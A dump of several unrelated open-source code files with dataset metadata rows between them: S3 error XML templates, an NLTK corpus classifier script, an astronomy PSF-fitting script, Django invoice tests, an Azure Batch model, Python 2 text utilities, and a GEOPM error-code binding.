<BucketName>{{ bucket_name }}</BucketName>
<RequestId>0D68A23BB2E2215B</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_LIFECYCLE = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchLifecycleConfiguration</Code>
<Message>The lifecycle configuration does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_BUCKET_TAGGING = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchTagSet</Code>
<Message>The TagSet does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_BUCKET_WEBSITE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchWebsiteConfiguration</Code>
<Message>The specified bucket does not have a website configuration</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_INVALID_CORS_REQUEST = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchWebsiteConfiguration</Code>
<Message>The specified bucket does not have a website configuration</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
S3_NO_CORS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchCORSConfiguration</Code>
<Message>The CORS configuration does not exist</Message>
<BucketName>{{ bucket_name }}</BucketName>
<RequestId>44425877V1D0A2F9</RequestId>
<HostId>9Gjjt1m+cjU4OPvX9O9/8RuvnG41MRb/18Oux2o5H5MY7ISNTlXN+Dz9IG62/ILVxhAGI0qyPfg=</HostId>
</Error>
"""
| apache-2.0 | 7,205,346,243,205,726,000 | 38.537975 | 182 | 0.595086 | false |
gicsi/aap | src/machine_learning/nltk-trainer-master/classify_corpus.py | 1 | 6324 | #!/usr/bin/env python
import argparse, itertools, operator, os, os.path, string
import nltk.data
from nltk.corpus import stopwords
from nltk.misc import babelfish
from nltk.tokenize import wordpunct_tokenize
from nltk.util import ngrams
from nltk_trainer import load_corpus_reader, join_words, translate
from nltk_trainer.classification.featx import bag_of_words
langs = [l.lower() for l in babelfish.available_languages]
########################################
## command options & argument parsing ##
########################################
# TODO: many of the args are shared with analyze_classifier_coverage, so abstract
parser = argparse.ArgumentParser(description='Classify a plaintext corpus to a classified corpus')
# TODO: make sure source_corpus can be a single file
parser.add_argument('source_corpus', help='corpus name/path relative to an nltk_data directory')
parser.add_argument('target_corpus', help='corpus name/path relative to an nltk_data directory')
parser.add_argument('--trace', default=1, type=int,
help='How much trace output you want, defaults to 1. 0 is no trace output.')
classifier_group = parser.add_argument_group('Classification Options')
parser.add_argument('--classifier', default=None,
help='pickled classifier name/path relative to an nltk_data directory')
parser.add_argument('--wordlist', default=None,
help='classified word list corpus for word/phrase classification')
parser.add_argument('--threshold', type=float, default=0.9,
help='Minimum probability required to write classified instance')
corpus_group = parser.add_argument_group('Corpus Reader Options')
corpus_group.add_argument('--reader',
default='nltk.corpus.reader.CategorizedPlaintextCorpusReader',
help='Full module path to a corpus reader class, such as %(default)s')
corpus_group.add_argument('--fileids', default=None,
help='Specify fileids to load from corpus')
corpus_group.add_argument('--instances', default='paras', choices=('sents', 'paras'),
help='''the group of words that represents a single training instance,
the default is to use entire files''')
feat_group = parser.add_argument_group('Feature Extraction',
'The default is to lowercase every word, strip punctuation, and use stopwords')
feat_group.add_argument('--ngrams', action='append', type=int,
help='use n-grams as features.')
feat_group.add_argument('--no-lowercase', action='store_true', default=False,
help="don't lowercase every word")
feat_group.add_argument('--filter-stopwords', default='no',
choices=['no']+stopwords.fileids(),
help='language stopwords to filter, defaults to "no" to keep stopwords')
feat_group.add_argument('--punctuation', action='store_true', default=False,
help="don't strip punctuation")
trans_group = parser.add_argument_group('Language Translation')
trans_group.add_argument('--source', default='english', choices=langs, help='source language')
trans_group.add_argument('--target', default=None, choices=langs, help='target language')
trans_group.add_argument('--retries', default=3, type=int,
help='Number of babelfish retries before quiting')
trans_group.add_argument('--sleep', default=3, type=int,
help='Sleep time between retries')
args = parser.parse_args()
###################
## corpus reader ##
###################
source_corpus = load_corpus_reader(args.source_corpus, args.reader)
if not source_corpus:
raise ValueError('%s is an unknown corpus')
if args.trace:
print 'loaded %s' % args.source_corpus
########################
## text normalization ##
########################
# TODO: copied from analyze_classifier_coverage, so abstract
if args.filter_stopwords == 'no':
stopset = set()
else:
stopset = set(stopwords.words(args.filter_stopwords))
if not args.punctuation:
stopset |= set(string.punctuation)
def norm_words(words):
if not args.no_lowercase:
words = [w.lower() for w in words]
if not args.punctuation:
words = [w.strip(string.punctuation) for w in words]
words = [w for w in words if w]
if stopset:
words = [w for w in words if w.lower() not in stopset]
if args.ngrams:
return reduce(operator.add, [words if n == 1 else ngrams(words, n) for n in args.ngrams])
else:
return words
##############
## classify ##
##############
if args.wordlist:
classifier = WordListClassifier(load_corpus_reader(args.wordlist))
elif args.classifier:
if args.trace:
print 'loading %s' % args.classifier
classifier = nltk.data.load(args.classifier)
else:
raise ValueError('one of wordlist or classifier is needed')
def label_filename(label):
# TODO: better file path based on args.target_corpus & label
path = os.path.join(args.target_corpus, '%s.txt' % label)
if not os.path.exists(args.target_corpus):
os.makedirs(args.target_corpus)
if args.trace:
print 'filename for category %s: %s' % (label, path)
return path
labels = classifier.labels()
label_files = dict([(l, open(label_filename(l), 'a')) for l in labels])
# TODO: create a nltk.corpus.writer framework with some initial CorpusWriter classes
if args.target:
if args.trace:
print 'translating all text from %s to %s' % (args.source, args.target)
featx = lambda words: bag_of_words(norm_words(wordpunct_tokenize(translate(join_words(words),
args.source, args.target, trace=args.trace, sleep=args.sleep, retries=args.retries))))
else:
featx = lambda words: bag_of_words(norm_words(words))
def classify_write(words):
feats = featx(words)
probs = classifier.prob_classify(feats)
label = probs.max()
if probs.prob(label) >= args.threshold:
label_files[label].write(join_words(words) + u'\n\n')
if args.trace:
print 'classifying %s' % args.instances
if args.instances == 'paras':
for para in source_corpus.paras():
classify_write(list(itertools.chain(*para)))
else: # args.instances == 'sents'
for sent in source_corpus.sents():
classify_write(sent)
# TODO: arg(s) to specify categorized word list corpus instead of classifier pickle
# can have additional arguments for decision threshold. this will create a
# KeywordClassifier that can be used just like any other NLTK classifier
# TODO: if new corpus files already exist, append to them, and make sure the
# first append example is separate (enough) from the last example in the file
# (we don't want to append a paragraph right next to another paragraph, creating a single paragraph) | gpl-3.0 | 918,427,968,374,105,300 | 35.560694 | 100 | 0.722011 | false |
PyWiFeS/tools | spectroastro2D.py | 1 | 4907 | """
From the 26 March meeting, the plan was:
1) Fix 2D separation and overall R flux ratio. Find best fit PSF.
Issues... the best fit PSF can't just be a Gaussian. It is naturally the convolution of
multiple functional forms, i.e. something that is positive everywhere. On a quick search,
I can't find any obvious parameterisations. Options...
a: Just use the interpolated PSF with a correction for the companion. Problem: we don't
know how to correct for the companion, so will have to do this iteratively.
b: Use a "distortion map".
c: Use a functional form that can be negative and don't worry about details.
2) Extract spectra of A and B components. This is best done with a *good seeing* night and doesn't have to
be done for every data set. Save these spectra.
3) Fix B spectrum, and using the PSFs from step (1) extract the 2D positions of the A and
B components.
Star: GaiaDR2 6110141563309613184
...
is:
2.343 arcsec North
0.472 arcsec East
It is 3.726 mags fainter in Rp.
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
import astropy.io.fits as pyfits
import glob
import scipy.optimize as op
import scipy.signal as sig
import time
import multiprocessing
import pdb
plt.ion()
#Settings
multiprocess=False #Setting this for a macbook changes total time from ~9 to ~5 seconds. Only a moderte help!
MIN_PEAK=20
NPSF_PARAMS = 5
WAVE = np.arange(6400.0,7000.0,0.25)
ddir = '/Users/mireland/data/pds70/190225/' #!!! This comes from
#ddir = '/Users/mireland/data/pds70/190225/' #From Marusa's reduction.
fns = np.sort(glob.glob(ddir + '*p11.fits'))
xscale = 1.0 #arcsec/pix
yscale = 0.5 #arcsec/pix
#---------------------------------
#Local function declarations
def PSF(p,x,y,companion_params=None):
"""A simple 2D PSF based on a Gaussian.
Parameters
----------
p: numpy array
Parameters for the PSF.
p[0]: x coordinate offset
p[1]: x coordinate width
p[2]: y coordinate offset
p[3]: y coordinate width
p[4]: Total flux
p[5]: 2nd order symmetric term
x: x coordinate in arcsec.
y: y coordinate in arcsec.
"""
xp = (x-p[0])/p[1]
yp = (y-p[2])/p[3]
if companion_params != None:
xp_comp = (x-p[0]-companion_params[1])/p[1]
yp_comp = (y-p[2]-companion_params[2])/p[3]
return p[4]*(np.exp(-(xp**2 + yp**2)/2.0) + companion_params[0]*np.exp(-(xp_comp**2 + yp_comp**2)/2.0))
else:
return p[4]*np.exp(-(xp**2 + yp**2)/2.0)
def PSF_resid(p,x,y,data, gain=1.0, rnoise=3.0):
"Residuals for fitting to a 1D Gaussian"
return ((PSF(p,x,y) - data)/10.).flatten() #np.sqrt(np.maximum(y,0) + rnoise**2)
def lsq_PSF( args ):
"""
Fit a Gaussian to data y(x)
Parameters
----------
args: tuple
guess_p, xfit, yfit
Notes
-----
nline: int
index of this line
guess_center: float
initial guess position
"""
fit = op.least_squares(PSF_resid, args[0], method='lm', \
xtol=1e-04, ftol=1e-4, f_scale=[3.,1.,1.], args=(args[1], args[2], args[3]))
#Check for unphysical solutions and set c_inv to zero for those solutions...
c_inv = fit.jac.T.dot(fit.jac)
return fit.x, c_inv
#---------------------------------
#Main "Script" code
pas = []
mjds = []
fits = []
sigs = []
yx_peak = np.zeros( (len(WAVE), 2), dtype=np.int)
peak_vals = np.zeros( len(WAVE) )
dds = []
#Loop through files and make a 2D fit.
for f in fns[-3:]:
ff = pyfits.open(f)
pas.append(ff[0].header['TELPAN'])
mjds.append(ff[0].header['MJD-OBS'])
dd = ff[0].data[:,8:-8,13:-2]
dds += [dd]
#Subtract off local sky contribution. Could be more sophisticated!
meds = np.median(dd.reshape(dd.shape[0], dd.shape[1]*dd.shape[2]), axis=1).reshape(dd.shape[0],1,1)
dd -= meds
#Find the maxima in every column.
for i in range(len(WAVE)):
yx_peak[i] = np.unravel_index(np.argmax(dd[i]), dd[i].shape)
peak_vals[i] = dd[i, yx_peak[i][0], yx_peak[i][1]]
#Create the x and y arrays
xs, ys = np.meshgrid(np.arange(dd.shape[2])*xscale, np.arange(dd.shape[1])*yscale)
#Now fit to every wavelength
for i in range(len(WAVE)):
fit, sig = lsq_PSF( ([yx_peak[i,1]*xscale,1,yx_peak[i,0]*yscale,1,peak_vals[i]], xs, ys, dd[i]) )
fits += [fit]
sigs += [sig]
fits = np.array(fits)
fits = fits.reshape( (len(fns), len(WAVE), NPSF_PARAMS) )
good = np.where(np.median(fits[:,:,4], axis=1) > 100)[0]
#Now find an average offset as a function of wavelength.
NE_offset = np.zeros( (len(WAVE),2) )
for i in good:
NE_offset[:,0] += np.cos(np.radians(pas[i]))*fits[i,:,2] + np.sin(np.radians(pas[i]))*fits[i,:,0]
NE_offset[:,1] += np.cos(np.radians(pas[i]))*fits[i,:,0] - np.sin(np.radians(pas[i]))*fits[i,:,2]
NE_offset /= len(fns)
| mit | 2,472,486,503,515,506,700 | 30.056962 | 111 | 0.619931 | false |
pkimber/invoice | invoice/tests/test_invoice.py | 1 | 4008 | # -*- encoding: utf-8 -*-
import pytest
from decimal import Decimal
from finance.tests.factories import VatSettingsFactory
from invoice.models import Invoice, InvoiceLine
from invoice.service import InvoicePrint
from invoice.tests.factories import (
InvoiceFactory,
InvoiceLineFactory,
InvoiceSettingsFactory,
TimeRecordFactory,
)
@pytest.mark.django_db
def test_create():
""" Create a simple invoice """
invoice = InvoiceFactory()
invoice.full_clean()
invoice.save()
assert invoice.pk > 0
assert invoice.number > 0
@pytest.mark.django_db
def test_create_with_lines():
""" Create a simple invoice with lines """
VatSettingsFactory()
invoice = InvoiceFactory()
line = InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('1.3'),
units='hours',
price=Decimal('300.00'),
)
line = InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('2.4'),
units='hours',
price=Decimal('200.23'),
)
assert invoice.pk > 0
assert Decimal('870.55') == invoice.net
assert Decimal('1044.66') == invoice.gross
assert line.is_credit is False
@pytest.mark.django_db
def test_description():
invoice = InvoiceFactory()
assert 'Invoice' == invoice.description
@pytest.mark.django_db
def test_get_first_line_number():
"""get the number for the first invoice line"""
invoice = InvoiceFactory()
assert 1 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number():
"""get the number for the next invoice line"""
invoice = InvoiceFactory()
InvoiceLineFactory(invoice=invoice, line_number=1)
InvoiceLineFactory(invoice=invoice, line_number=2)
assert 3 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number_fill_gap():
"""get the number for the next invoice line"""
invoice = InvoiceFactory()
InvoiceLineFactory(invoice=invoice, line_number=1)
InvoiceLineFactory(invoice=invoice, line_number=2)
InvoiceLineFactory(invoice=invoice, line_number=4)
assert 3 == invoice.get_next_line_number()
@pytest.mark.django_db
def test_get_next_line_number_two_invoices():
"""get the number for the next invoice line"""
invoice_1 = InvoiceFactory()
InvoiceLineFactory(invoice=invoice_1, line_number=1)
InvoiceLineFactory(invoice=invoice_1, line_number=2)
invoice_2 = InvoiceFactory()
InvoiceLineFactory(invoice=invoice_2, line_number=1)
assert 3 == invoice_1.get_next_line_number()
assert 2 == invoice_2.get_next_line_number()
@pytest.mark.django_db
def test_has_lines():
"""does the invoice have any lines"""
invoice = InvoiceFactory()
InvoiceLineFactory(
invoice=invoice,
quantity=Decimal('1.3'),
units='hours',
price=Decimal('300.00'),
)
assert invoice.has_lines is True
@pytest.mark.django_db
def test_has_lines_not():
invoice = InvoiceFactory()
assert invoice.has_lines is False
@pytest.mark.django_db
def test_next_number():
InvoiceFactory(number=99)
assert 100 == Invoice.objects.next_number()
@pytest.mark.django_db
def test_next_number_2():
InvoiceFactory(number=99, deleted=True)
InvoiceFactory(number=98, deleted_version=1)
assert 1 == Invoice.objects.next_number()
@pytest.mark.django_db
def test_user_can_edit():
line = InvoiceLineFactory()
assert line.user_can_edit is True
@pytest.mark.django_db
def test_user_can_edit_has_time():
line = InvoiceLineFactory()
TimeRecordFactory(invoice_line=line)
assert line.user_can_edit is False
@pytest.mark.django_db
def test_user_can_edit_invoice():
InvoiceSettingsFactory()
VatSettingsFactory()
invoice = InvoiceFactory()
line = InvoiceLineFactory(invoice=invoice)
TimeRecordFactory(invoice_line=line)
InvoicePrint().create_pdf(invoice, None)
# refresh
line = InvoiceLine.objects.get(pk=line.pk)
assert line.user_can_edit is False
| apache-2.0 | 9,188,526,177,818,257,000 | 25.899329 | 56 | 0.692365 | false |
AutorestCI/azure-sdk-for-python | azure-batch/azure/batch/models/compute_node_endpoint_configuration.py | 1 | 1092 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ComputeNodeEndpointConfiguration(Model):
"""The endpoint configuration for the compute node.
:param inbound_endpoints: The list of inbound endpoints that are
accessible on the compute node.
:type inbound_endpoints: list[~azure.batch.models.InboundEndpoint]
"""
_validation = {
'inbound_endpoints': {'required': True},
}
_attribute_map = {
'inbound_endpoints': {'key': 'inboundEndpoints', 'type': '[InboundEndpoint]'},
}
def __init__(self, inbound_endpoints):
self.inbound_endpoints = inbound_endpoints
| mit | -1,403,595,323,034,182,100 | 33.125 | 86 | 0.608059 | false |
quadrismegistus/litlab-poetry | prosodic/treegrid/pytxt.py | 1 | 10492 | import re,os
def yank(text,tag,none=None):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
try:
return text.split(tag[0])[1].split(tag[1])[0]
except IndexError:
return none
def yanks(text,tag):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
return [ x.split(tag[1])[0] for x in text.split(tag[0])[1:] ]
def yanks2(text,tag):
if type(tag)==type(''):
tag=tagname2tagtup(tag)
ys=[]
#return [ tag[0][-1].join(x.split(tag[0][:-1])[1].split(tag[0][-1])[1:]) for x in text.split(tag[1])[:-1] ]
for x in text.split(tag[1])[:-1]:
try:
x=x.split(tag[0][:-1])[1].split(tag[0][-1])[1:]
x=tag[0][-1].join(x)
except IndexError:
pass
ys.append(x)
return ys
def tagname2tagtup(tagname):
return ('<'+tagname+'>','</'+tagname+'>')
def safestr(string):
try:
return str(string)
except UnicodeEncodeError:
return str(string.encode('utf-8','replace'))
except:
return "<????>"
def dict2xml(d,root="xml"):
o=[]
for k,v in sorted(d.items(),reverse=False):
o+=["<"+k+">"+v+"</"+k+">"]
return "<"+root+">\n\t"+ "\n\t".join(o) + "\n</"+root+">"
def neginback(strnum):
if strnum.startswith("-"):
return strnum[1:]+"-"
else:
return strnum
def thetime():
from time import localtime, strftime
return strftime("%Y%m%d.%H%M", localtime())
# these two lists serves as building blocks to construt any number
# just like coin denominations.
# 1000->"M", 900->"CM", 500->"D"...keep on going
decimalDens=[1000,900,500,400,100,90,50,40,10,9,5,4,1]
romanDens=["M","CM","D","CD","C","XC","L","XL","X","IX","V","IV","I"]
def roman(dec):
"""
Perform sanity check on decimal and throws exceptions when necessary
"""
if dec <=0:
raise ValueError, "It must be a positive"
# to avoid MMMM
elif dec>=4000:
raise ValueError, "It must be lower than MMMM(4000)"
return decToRoman(dec,"",decimalDens,romanDens)
def decToRoman(num,s,decs,romans):
"""
convert a Decimal number to Roman numeral recursively
num: the decimal number
s: the roman numerial string
decs: current list of decimal denomination
romans: current list of roman denomination
"""
if decs:
if (num < decs[0]):
# deal with the rest denomination
return decToRoman(num,s,decs[1:],romans[1:])
else:
# deduce this denomation till num<desc[0]
return decToRoman(num-decs[0],s+romans[0],decs,romans)
else:
# we run out of denomination, we are done
return s
def ynk(text,start,end,inout=""):
if (not start in text) or (not end in text):
return ""
try:
if (inout=="in" or inout==0):
return text.split(start)[1].split(end)[0]
elif (inout=="out" or inout==1):
return text.split(end)[0].split(start)[-1]
else:
o=[]
for x in text.split(start):
#if x.count(">")>1:
# x=x[x.index(">")+1:]
xx=x.split(end)[0].strip()
if not xx: continue
if xx.startswith("<!DOCTYPE"): continue # NYT hack
if xx.startswith("<NYT_"): continue
if xx.startswith("<script"): continue
o.append(xx.replace("\n"," ").replace("\r"," "))
return "\n\n".join(o)
except:
return ""
def tsv2ld(fn,tsep='\t',nsep='\n'):
f=open(fn,'r')
t=f.read()
t=t.replace('\r\n','\n')
t=t.replace('\r','\n')
f.close()
header=[]
listdict=[]
for line in t.split(nsep):
if not line.strip(): continue
line=line.replace('\n','')
ln=line.split(tsep)
#print ln
if not header:
header=ln
continue
edict={}
for i in range(len(ln)):
k=header[i]
v=ln[i].strip()
if v.startswith('"') and v.endswith('"'):
v=v[1:-1]
edict[k]=v
if edict:
listdict.append(edict)
return listdict
def unhtml(data):
return remove_html_tags(data)
def remove_html_tags(data):
data=safestr(data)
p=re.compile(r'<.*?>')
y=str(p.sub('',data)).strip().split('">')
while(('&' in y) and (';' in y)):
y=y[:y.index('&')]+y[y.index(';')+1:]
try:
return y[1].strip()
except:
return y[0]
def extractTags(text,leavetexttags=[u"placeName"]):
tags=[]
tags_milestone=[]
yankeds=[]
if "</" in text:
for x in text.split("</")[1:]:
tags.append(x.split(">")[0])
if "/>" in text:
for x in text.split("/>")[:-1]:
x=x.split("<")[-1]
try:
x=x.split()[0]
except IndexError:
x=x
#if "/" in x: continue
#if not x: continue
tags_milestone.append(x)
for tag in tags_milestone:
yanked=yank(text,("<"+tag,"/>"))
while yanked.strip():
ydat="<"+tag+yanked+"/>"
#yankeds.append(ydat)
text=text.replace(ydat,' ')
yanked=yank(text,("<"+tag,"/>"))
for tag in tags:
yanked=yank(text,("<"+tag,"</"+tag+">"))
while yanked and yanked.strip():
ydat="<"+tag+yanked+"</"+tag+">"
if tag in leavetexttags:
text=text.replace(ydat,remove_html_tags(yanked.split(">")[-1]))
else:
yankeds.append(ydat)
text=text.replace(ydat,' ')
yanked=yank(text,("<"+tag,"</"+tag+">"))
return (text.replace("\n","").replace("\r",""),yankeds)
def gleanPunc(aToken):
aPunct = None
while(len(aToken) > 0 and not aToken[0].isalnum()):
aPunct = aToken[:1]
aToken = aToken[1:]
while(len(aToken) > 0 and not aToken[-1].isalnum()):
aPunct = aToken[-1]
aToken = aToken[:-1]
return (aToken, aPunct)
def noPunc(token):
x=gleanPunc(token)[0]
x=x.split('&')[0]
y=x.split(';')
try:
x=y[1]
except IndexError:
pass
x=x.split('\\')[0]
return x
def ngram(l,n=3):
grams=[]
gram=[]
for x in l:
gram.append(x)
if len(gram)<n: continue
g=tuple(gram)
grams.append(g)
gram.reverse()
gram.pop()
gram.reverse()
return grams
def readDict(fn,sep='\t'):
try:
d={}
f=open(fn)
for line in f:
ln=line.split(sep)
k=ln[0].strip()
v=ln[1].strip()
if v.isdigit():
d[k]=int(v)
else:
d[k]=v
if len(d):
return d
else:
return None
except IOError:
return {}
def writeDict(fn,d,sep="\t",toprint=True):
o=""
for k,v in d.items():
o+=sep.join(str(x) for x in [k,v])+"\n"
write(fn,o,toprint)
def extractTagsAsDict(text,leavetexttags=[u"placeName"]):
text,tags=extractTags(text,leavetexttags)
tagdict={}
for tag in tags:
opentag=tag.split(">")[0].split("<")[1].strip()
tagbody=unhtml(tag).strip()
if not tagbody: continue
if " " in opentag:
spaces=opentag.split()
tagname=spaces[0]
for space in spaces[1:2]:
if not space.strip(): continue
dat=space.strip().split("=")
k=dat[0]
try:
v=dat[1]
except:
continue
v=v.replace('"','').replace("'","").strip()
try:
tagdict[tagname][k][v]=tagbody
except KeyError:
try:
tagdict[tagname][k]={}
tagdict[tagname][k][v]=tagbody
except KeyError:
tagdict[tagname]={}
tagdict[tagname][k]={}
tagdict[tagname][k][v]=tagbody
else:
tagname=opentag
tagdict[tagname]=tagbody
return tagdict
def writeToFile(folder,fn,data,extension="tsv"):
#ofolder=os.path.join(folder,'results','stats','corpora',name)
if not os.path.exists(folder):
os.makedirs(folder)
ofn=os.path.join(folder,'.'.join([fn,extension]))
print ">> saved: "+ofn
of = open(ofn,'w')
of.write(data)
of.close()
def write_xls(fn,data,sheetname='index',toprint=True,limFields=None,widths=[]):
import xlwt
wb=xlwt.Workbook(encoding='utf-8')
if type(data)!=({}):
dd={}
dd[sheetname]=data
else:
dd=data
for sheetname,data in sorted(dd.items()):
ws=wb.add_sheet(sheetname)
nr=-1
style = xlwt.easyxf('align: wrap True')
#style=xlwt.easyxf('')
for row in data:
nc=-1
nr+=1
for cell in row:
nc+=1
#
# try:
# cell=unicode(cell)
# except UnicodeDecodeError:
# cell=cell.decode('utf-8')
# print cell
if not (type(cell)==type(1) or type(cell)==type(1.0)):
ws.row(nr).set_cell_text(nc,cell,style)
else:
ws.row(nr).set_cell_number(nc,cell,style)
# for i in range(len(widths)):
# w=widths[i]
# if not w: continue
# ws.col(i).width=w
wb.save(fn)
if toprint:
print ">> saved: "+fn
def tmp(data):
import tempfile
f=tempfile.NamedTemporaryFile()
f.write(data)
#f.close()
return f
def write_tmp(data,suffix=''):
import time
fn='/Lab/Processing/tmp/'+str(time.time()).replace('.','')+suffix
write(fn,data)
return fn
def write(fn,data,toprint=False,join_line='\n',join_cell='\t'):
if type(data)==type([]):
o=""
for x in data:
if type(x)==type([]):
z=[]
for y in x:
if type(y)==type(u''):
y=y.encode('utf-8')
z+=[y]
x=z
line=join_cell.join(x)
else:
try:
line=str(x)
except UnicodeEncodeError:
line=x.encode('utf-8')
line=line.replace('\r','').replace('\n','')
o+=line+join_line
else:
o=str(data)
of = open(fn,'w')
of.write(o)
of.close()
if toprint:
print ">> saved: "+fn
def makeminlength(string,numspaces):
if len(string) < numspaces:
for i in range(len(string),numspaces):
string += " "
return string
def get_class( kls ):
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
return m
def gleanPunc(aToken):
aPunct = None
while(len(aToken) > 0 and not aToken[0].isalnum()):
aPunct = aToken[:1]
aToken = aToken[1:]
while(len(aToken) > 0 and not aToken[-1].isalnum()):
aPunct = aToken[-1]
aToken = aToken[:-1]
return (aToken, aPunct)
def count(string, look_for):
start = 0
matches = 0
while True:
start = string.find (look_for, start)
if start < 0:
break
start += 1
matches += 1
return matches
def choose(optionlist,msg="please select from above options [using commas for individual selections and a hyphen for ranges]:\n"):
seldict={}
selnum=0
print
print
if type(optionlist)==type([]):
for option in optionlist:
selnum+=1
seldict[selnum]=option
print "\t"+"\t".join(str(x) for x in [selnum,option])
elif type(optionlist)==type({}):
for option,desc in optionlist.items():
selnum+=1
seldict[selnum]=option
print "\t"+"\t".join(str(x) for x in [selnum,option,desc])
inp=raw_input("\n\t>> "+msg+"\n\t").strip()
sels=[]
for np in inp.split(","):
np=np.strip()
if "-" in np:
try:
nn=np.split("-")
for n in range(int(nn[0]),int(nn[1])+1):
sels.append(seldict[n])
except:
continue
else:
try:
sels.append(seldict[int(np)])
except:
continue
return sels
def hash(string):
import hashlib
return str(hashlib.sha224(string).hexdigest()) | mit | -8,339,637,571,409,473,000 | 19.737154 | 130 | 0.596454 | false |
geopm/geopm | scripts/geopmpy/error.py | 1 | 3896 | #!/usr/bin/env python3
#
# Copyright (c) 2015 - 2021, Intel Corporation
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY LOG OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# pylint: disable=deprecated-sys-function
from __future__ import absolute_import
import cffi
import sys
_ffi = cffi.FFI()
_ffi.cdef("""
enum geopm_error_e {
GEOPM_ERROR_RUNTIME = -1,
GEOPM_ERROR_LOGIC = -2,
GEOPM_ERROR_INVALID = -3,
GEOPM_ERROR_FILE_PARSE = -4,
GEOPM_ERROR_LEVEL_RANGE = -5,
GEOPM_ERROR_NOT_IMPLEMENTED = -6,
GEOPM_ERROR_PLATFORM_UNSUPPORTED = -7,
GEOPM_ERROR_MSR_OPEN = -8,
GEOPM_ERROR_MSR_READ = -9,
GEOPM_ERROR_MSR_WRITE = -10,
GEOPM_ERROR_AGENT_UNSUPPORTED = -11,
GEOPM_ERROR_AFFINITY = -12,
GEOPM_ERROR_NO_AGENT = -13,
};
void geopm_error_message(int err, char *msg, size_t size);
""")
try:
_dl = _ffi.dlopen('libgeopmpolicy.so', _ffi.RTLD_GLOBAL|_ffi.RTLD_LAZY)
except OSError as ee:
raise OSError('This module requires libgeopmpolicy.so to be present in your LD_LIBRARY_PATH.') from ee
ERROR_RUNTIME = _dl.GEOPM_ERROR_RUNTIME
ERROR_LOGIC = _dl.GEOPM_ERROR_LOGIC
ERROR_INVALID = _dl.GEOPM_ERROR_INVALID
ERROR_FILE_PARSE = _dl.GEOPM_ERROR_FILE_PARSE
ERROR_LEVEL_RANGE = _dl.GEOPM_ERROR_LEVEL_RANGE
ERROR_NOT_IMPLEMENTED = _dl.GEOPM_ERROR_NOT_IMPLEMENTED
ERROR_PLATFORM_UNSUPPORTED = _dl.GEOPM_ERROR_PLATFORM_UNSUPPORTED
ERROR_MSR_OPEN = _dl.GEOPM_ERROR_MSR_OPEN
ERROR_MSR_READ = _dl.GEOPM_ERROR_MSR_READ
ERROR_MSR_WRITE = _dl.GEOPM_ERROR_MSR_WRITE
ERROR_AGENT_UNSUPPORTED = _dl.GEOPM_ERROR_AGENT_UNSUPPORTED
